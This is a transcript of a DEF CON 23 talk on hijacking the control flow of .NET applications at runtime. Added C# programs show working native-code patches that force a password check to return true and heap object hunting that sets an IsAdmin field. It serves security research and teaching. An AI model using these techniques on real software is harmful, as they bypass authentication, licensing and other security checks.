
DEF CON 23 - Hijacking Arbitrary .NET Application Control Flow

This talk demonstrates attacking .NET applications at runtime. I will show how to modify running applications with advanced .NET and assembly-level attacks that alter the control flow of any .NET application. New attack techniques and tools will be released to allow penetration testers and attackers to carry out advanced post-exploitation attacks.

This presentation gives an overview of how to use these tools in a real attack sequence and gives a view into the .NET hacker space.

Topher Timzen

August 09, 2015


Transcript

  1. Hijacking Arbitrary .NET
    Application Control Flow
    Topher Timzen

  2. #whoami
    Security Researcher, Intel
    Security Trainer
    TopherTimzen.com
    @TTimzen

  3. Overview
    .NET?
    Runtime Attacks
    Modify Control Flow
    Machine Code Editing
    Managed Heap

  4. Why are we Here?
    Tools Released
    Use .NET to attack
    Using Objects on the Heap

  5. CLR Attacks
    Controlling the Common Language
    Runtime
    Accessing raw objects on Managed Heap
    Manipulate AppDomains
    • Controlling all Loaded Code
    • Controlling Just-In-Time Compilation

  6. Attack With ASM
    Manipulate Resources
    Attack methods at ASM level
    Alter application control flow

  7. Runtime (diagram)
    A .NET process hosts the CLR (2.0/4.0) and its AppDomains; AppDomains load assemblies (.EXE and .DLLs); assemblies hold classes, whose methods carry the logic; objects expose properties, fields and instance methods.

  8. The Tools: Gray Frost & Gray Storm

  9. Gray Frost

  10. Gray Frost
    Payload delivery system
    C++ .NET CLR bootstrapper
    Creates or injects a 4.0 runtime
    Capability to pivot into the 2.0 runtime
    Contains the raw payload
    2 rounds:
    • GrayFrostCpp (native bootstrapper)
    • GrayFrostCSharp (C# payload)

  11-18. Round 1 and Round 2 (diagram)
    Round 1: GrayFrostCpp enters the .NET process, goes through mscoree (the CLR shim) to obtain a runtime, then loads GrayFrostCSharp.
    Round 2: GrayFrostCSharp, now running inside the .NET process, invokes the payload's void main().

  19-26. Pivoting Between runtimes (diagram)
    The same sequence is repeated inside the .NET process: GrayFrostCpp goes back through mscoree to bring up the second runtime and loads GrayFrostCSharp into it, so the payload can run under either CLR.

  27. Gray Storm

  28. Gray Storm
    Reconnaissance and in-memory attack payload
    Features:
    • Attacking the .NET JIT
    • Attacking .NET at the ASM level
    • ASM and Metasploit payloads
    • Utilize objects on the Managed Heap

  29. Gray Storm Usage (screenshot)

  30. Controlling the JIT
    A class's Method Table holds the entry address of each of its methods, initially a JIT stub
    During JIT compilation the Method Table is referenced to find that stub
    We can control that address and so redirect every call to the method
    The Method Table is not on the Managed Heap, so the change survives Garbage Collection

  31-32. Controlling the JIT (screenshots)

  33. Control Flow Attacks
    JIT-compiled .NET code uses both direct (relative) and indirect (absolute) calls:
    E8 rel32        call rel32                 (near relative call)
    FF 15 disp32    call dword ptr [disp32]    (indirect call through an absolute address; on x64 the same encoding is RIP-relative and disassembles as call qword ptr [rip+disp32])
    relCall = dstAddress - (currentLocation + lenOfCall), with lenOfCall = 5 for E8 rel32

  34. ASM Payloads
    The address of a method is known through Reflection
    Overwrite the method's logic with new ASM
    Steal stack parameters
    Change events

  35. ASM Payloads
    Change return TRUE to return FALSE (or the reverse):
    Password validation
    Key & licensing validation
    SQL sanitization
    Destroy security mechanisms
    Overwrite logic
    Update mechanisms
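The program below is an example added to this page, not Gray Storm or Gray Frost code, showing on a toy class the two ASM-level attacks slides 33 to 35 describe: overwriting a validation method's native body so it always returns TRUE, and redirecting a method with a JMP whose rel32 is computed with the formula from slide 33. The Validator class, the kernel32 P/Invoke declarations and the patch bytes are my own; it assumes .NET Framework on Windows (x86 or x64) and is built as a console .exe.

```csharp
using System;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// Toy target: a validation routine of the kind slide 35 lists (password/licence checks).
class Validator
{
    [MethodImpl(MethodImplOptions.NoInlining)]   // keep a real call site; inlined code cannot be patched this way
    public static bool CheckPassword(string pw) { return pw == "s3cret"; }

    [MethodImpl(MethodImplOptions.NoInlining)]
    public static bool AlwaysTrue(string pw) { return true; }
}

static class NativePatch
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtect(IntPtr addr, UIntPtr size, uint newProtect, out uint oldProtect);
    const uint PAGE_EXECUTE_READWRITE = 0x40;

    // Force the JIT and return the entry point callers jump to. On .NET Framework this may be
    // a precode stub rather than the compiled body, but callers go through it either way.
    public static IntPtr EntryPoint(MethodInfo m)
    {
        RuntimeHelpers.PrepareMethod(m.MethodHandle);
        return m.MethodHandle.GetFunctionPointer();
    }

    public static void Write(IntPtr addr, byte[] code)
    {
        uint old;
        if (!VirtualProtect(addr, (UIntPtr)(uint)code.Length, PAGE_EXECUTE_READWRITE, out old))
            throw new InvalidOperationException("VirtualProtect failed, error " + Marshal.GetLastWin32Error());
        Marshal.Copy(code, 0, addr, code.Length);
        VirtualProtect(addr, (UIntPtr)(uint)code.Length, old, out old);
    }

    // rel32 for a 5-byte E8 (CALL) or E9 (JMP) placed at src: dst - (src + 5), as on slide 33.
    public static int Rel32(IntPtr src, IntPtr dst)
    {
        long delta = dst.ToInt64() - (src.ToInt64() + 5);
        if (delta < int.MinValue || delta > int.MaxValue)
            throw new InvalidOperationException("target is outside rel32 range; use an absolute jump on x64");
        return (int)delta;
    }

    public static byte[] JmpRel32(IntPtr src, IntPtr dst)
    {
        byte[] code = new byte[5];
        code[0] = 0xE9;                                          // JMP rel32
        Buffer.BlockCopy(BitConverter.GetBytes(Rel32(src, dst)), 0, code, 1, 4);
        return code;
    }
}

class Program
{
    static void Main()
    {
        MethodInfo check = typeof(Validator).GetMethod("CheckPassword");
        MethodInfo fake  = typeof(Validator).GetMethod("AlwaysTrue");
        Console.WriteLine("original:       " + Validator.CheckPassword("wrong"));   // False

        // Patch 1 (slide 35, change the return value): mov eax,1 ; ret.
        // A bool comes back in EAX on x86 and x64. The single string argument travels in
        // ECX/RCX, so a plain RET is correct; on x86 with stack-passed arguments the managed
        // callee must clean the stack with RET imm16 instead.
        IntPtr entry = NativePatch.EntryPoint(check);
        NativePatch.Write(entry, new byte[] { 0xB8, 0x01, 0x00, 0x00, 0x00, 0xC3 });
        Console.WriteLine("ret-true patch: " + Validator.CheckPassword("wrong"));   // True

        // Patch 2 (slide 34, overwrite the method's logic): tail-jump into a replacement with
        // the same signature, so the arguments and return address are untouched.
        NativePatch.Write(entry, NativePatch.JmpRel32(entry, NativePatch.EntryPoint(fake)));
        Console.WriteLine("jmp patch:      " + Validator.CheckPassword("wrong"));   // True
    }
}
```

Before patching a real target, dump the first bytes at the entry point in WinDbg (u on the address) to confirm you are looking at the code callers actually reach; a debugger attached during JIT, or an optimizing JIT that inlines the target, changes what is at that address.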

  36. ASM Payloads (screenshot)

  37. ASM Payloads
    Metasploit
    Hand rolled
    Process Environment Block (PEB) changes

  38. Process Environment Block
    http://www.tophertimzen.com/blog/shellcodeDotNetPEB/

  39. Object Hunting in Memory

  40. Managed Heap
    Storage point for .NET objects
    New reference objects are added to the heap
    The Garbage Collector removes dead objects

  41. Managed Heap
    Let's manipulate it!

  42. Object Hunting in Memory
    Object references are IntPtr-sized pointers
    They point to the object instance on the Managed Heap
    All instantiated objects of the same class share the same Method Table
    Reflection + object hunting = win

  43. Finding Objects at Runtime
    i. Construct an object and find location
    of Managed Heap
    ii. Signature instantiated type
    iii. Scan Managed Heap for object pointers
    iv. Convert object pointers to raw objects
    v. ????
    vi. PROFIT

  44. Finding Objects at Runtime (steps from slide 43 repeated; step i follows)

  45. Construct an Object
    Use Reflection to invoke a constructor
    Can instantiate any object
    If a constructor takes other objects, pass null for them
    https://gist.github.com/tophertimzen/010b19fdbde77f251414

  46-49. Find location of Managed Heap (diagram)
    A reference on the STACK holds IntPtr = 024e9fe8; that address is the object instance on the Managed Heap (addresses rising from L to H), whose first words read 00000005 00000001 00000000 (the diagram labels the first of them IntPtr = 5). The seed object's address is therefore a known location inside the Managed Heap.
    https://gist.github.com/tophertimzen/812aa20dbe23cb42756d

  50. Finding Objects at Runtime (steps from slide 43 repeated; step ii follows)

  51. Signature instantiated type
    Object instances begin with a Method Table pointer to their type (x86):
    bytes 0-3 of the object are the Method Table (MT) pointer
    bytes 4-7 of the MT hold the instance size
    0:009> dd 024e9fe8
    024e9fe8 00774828 0000038c 00000001 00000000

  52. Signature instantiated type
    Object instances begin with a Method Table pointer to their type (x64):
    bytes 0-7 of the object are the Method Table (MT) pointer
    bytes 8-11 of the MT hold the instance size
    0:008> dd 00000000024e9fe8
    00000000`0286b8e0 ea774828 000007fe

  53. Finding Objects at Runtime (steps from slide 43 repeated; step iii follows)

  54. Scan Managed Heap
    Scan down from the seed object, incrementing by the object's instance size
    Scan linearly up to the top of the heap
    Compare each candidate's Method Table pointer to the reference MT
    If they match, record the object's address as an IntPtr

  55. Finding Objects at Runtime (steps from slide 43 repeated; step iv follows)

  56-58. Convert object ptr -> raw obj (diagram)
    A Refer holder on the STACK has a field typed System.IntPtr containing pointer(024ea00c); the same storage is then reinterpreted with the field typed GrayStorm.testClass, so it becomes a live reference to the object at 024ea00c on the Managed Heap (addresses rising from L to H).
    https://gist.github.com/tophertimzen/1da2b0aab6245ed1c27b

  59. Finding Objects at Runtime (steps from slide 43 repeated; step v follows)

  60. ????

  61. PROFIT

  62. Superpowers and Things?
    Change Keys
    Change Fields / Properties
    Call Methods
    With arguments!
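The program below is an added example, not the Gray Storm implementation or the code in the linked gists. It runs the procedure from slides 43 to 58 against a toy Session class defined here: construct a seed object through reflection (nulling reference-typed constructor arguments), read the seed's Method Table pointer as the type signature, scan the heap region that holds the seed for other slots carrying the same pointer, turn the raw pointers back into object references, then change a field and call a method on each recovered instance as slide 62 describes. The Session class, the kernel32 VirtualQuery import and every name in it are my own; it assumes .NET Framework on Windows (x86 or x64) and must be compiled with /unsafe.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Reflection;
using System.Runtime.InteropServices;

// Toy target type; in a real hunt only its name would be known and the Type would come from reflection.
class Session
{
    public string User;
    public bool IsAdmin;
    public Session(string user, bool isAdmin) { User = user; IsAdmin = isAdmin; }
    public string Describe() { return User + (IsAdmin ? " [admin]" : ""); }
}

static unsafe class ObjectHunter
{
    [StructLayout(LayoutKind.Sequential)]
    struct MEMORY_BASIC_INFORMATION
    {
        public IntPtr BaseAddress, AllocationBase;
        public uint AllocationProtect;
        public IntPtr RegionSize;
        public uint State, Protect, Type;
    }
    [DllImport("kernel32.dll")]
    static extern UIntPtr VirtualQuery(IntPtr addr, out MEMORY_BASIC_INFORMATION mbi, UIntPtr len);

    // Step i: run a constructor through reflection, passing null for reference-typed
    // parameters and default(T) for value types (slide 45's "nullify them").
    public static object Construct(Type t)
    {
        ConstructorInfo ctor = t.GetConstructors(BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic)[0];
        object[] args = ctor.GetParameters()
            .Select(p => p.ParameterType.IsValueType ? Activator.CreateInstance(p.ParameterType) : null)
            .ToArray();
        return ctor.Invoke(args);
    }

    // A reference is the address of the object's Method Table slot (bytes 0-3 on x86, 0-7 on x64);
    // the object header is the pointer-sized word just below it.
    public static IntPtr AddressOf(object o)
    {
        TypedReference tr = __makeref(o);
        return **(IntPtr**)&tr;
    }

    // Step iv: store a raw pointer into a null reference variable and hand it back typed as object.
    public static object ObjectAt(IntPtr p)
    {
        object o = null;
        TypedReference tr = __makeref(o);
        **(IntPtr**)&tr = p;
        return o;
    }

    // Steps i-iii: seed the heap, take the seed's Method Table as the type signature, then scan the
    // committed region that holds the seed one pointer at a time for other slots holding that MT.
    public static List<IntPtr> Hunt(Type t)
    {
        object seed = Construct(t);
        IntPtr seedAddr = AddressOf(seed);
        IntPtr mt = *(IntPtr*)seedAddr;
        if (mt != t.TypeHandle.Value) throw new InvalidOperationException("unexpected MethodTable");

        MEMORY_BASIC_INFORMATION mbi;
        VirtualQuery(seedAddr, out mbi, (UIntPtr)(uint)Marshal.SizeOf(typeof(MEMORY_BASIC_INFORMATION)));
        byte* lo = (byte*)mbi.BaseAddress + IntPtr.Size;
        byte* hi = (byte*)mbi.BaseAddress + mbi.RegionSize.ToInt64();

        var hits = new List<IntPtr>();
        for (byte* p = lo; p + IntPtr.Size <= hi; p += IntPtr.Size)
        {
            if (*(IntPtr*)p != mt || (IntPtr)p == seedAddr) continue;
            // Crude plausibility check: an object that has never been hashed or locked has a zero
            // header word, while a field elsewhere that merely stores the MT value (System.RuntimeType
            // keeps the type handle, for instance) is usually preceded by non-zero data.
            if (*(IntPtr*)(p - IntPtr.Size) != IntPtr.Zero) continue;
            hits.Add((IntPtr)p);
        }
        GC.KeepAlive(seed);
        return hits;
    }
}

class Program
{
    static void Main()
    {
        // Constructed sample instances standing in for the target application's live objects.
        var live = new List<Session> { new Session("alice", false), new Session("bob", false) };

        Type t = typeof(Session);
        foreach (IntPtr p in ObjectHunter.Hunt(t))
        {
            object o = ObjectHunter.ObjectAt(p);
            // Step v (slide 62): change a field and call a method on the recovered instance.
            t.GetField("IsAdmin").SetValue(o, true);
            Console.WriteLine(p.ToString("x") + " -> " + t.GetMethod("Describe").Invoke(o, null));
        }
        GC.KeepAlive(live);
    }
}
```

The region VirtualQuery returns is only the committed range that contains the seed; the slides scan up to the top of the heap, and objects in older generations or the large object heap may live in other segments. A garbage collection between Hunt and ObjectAt can move or free a candidate, so a tool should re-read the Method Table at the pointer before trusting it, or on .NET 4.6 and later run the scan inside GC.TryStartNoGCRegion. Stale copies left in free space after compaction can also pass the header check; treat a hit as a lead to validate, not as proof.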

  63. Automation

  64. Automation
    GrayFrost can be used with automated payloads

  65. Constructing Attack Chains

  66. How to construct attack chains
    Gray Wolf / IL decompiler
    • Find methods, fields & properties of interest
    • Locate meaningful objects
    • Discover high-level control flow
    Gray Storm "debugging" functionality
    • Breakpoint at constructors or methods from method pointers
    • Use with WinDbg
    Utilize DLL hijacking!

  67. Hybrid .NET/ASM Attacks
    Hybrid C#/ASM code in .NET
    Encrypting .NET payloads and
    unwinding
    Encrypting ASM Payloads

  68. Payload System
    C# is easy
    Gray Frost can be used in any application
    The gap between low-level (ASM) and high-level (C#) code is easy to bridge

  69. .NET Hacking Space
    Small
    Few tools
    Mostly hacking WoW
    Lots of PowerShell
    Previous DEF CON talks
    DEF CON 18 & 19 - Jon McCoy

  70. Conclusion
    Arbitrary .NET applications can
    be injected and changed
    New .NET attack possibilities
    New tools that support
    automation
    Get Gray Frost and Storm
    github.com/graykernel

  71. Questions?
    Contact Me
    @TTimzen
    https://www.tophertimzen.com
    Get Gray Frost and Storm
    github.com/graykernel
    White Papers
    Hijacking Arbitrary .NET Application Control Flow
    Acquiring .NET Objects from the Managed Heap